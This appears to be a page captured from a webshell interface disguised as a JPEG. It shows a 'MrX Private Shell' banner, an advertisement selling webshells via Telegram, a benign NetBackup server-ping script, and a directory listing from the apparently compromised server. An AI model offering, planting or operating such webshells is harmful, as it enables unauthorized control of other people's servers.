����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# 400_verify_nbu.sh
# check that NBU master server is actually available (ping)
[ "${NBU_SERVER}" ]
StopIfError "NBU Master Server not set in bp.conf (TCPSERVERADDRESS) !"
if test "$PING" ; then
if ping -c 1 "${NBU_SERVER}" >/dev/null 2>&1; then
Log "NBU Master Server ${NBU_SERVER} seems to be up and running."
else
Error "Sorry, but cannot reach NBU Master Server ${NBU_SERVER}"
fi
else
Log "Skipping ping test"
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 380_request_client_destination.sh | File | 2.57 KB | 0644 |
|
| 390_request_point_in_time_restore_parameters.sh | File | 2.08 KB | 0644 |
|
| 400_verify_nbu.sh | File | 427 B | 0644 |
|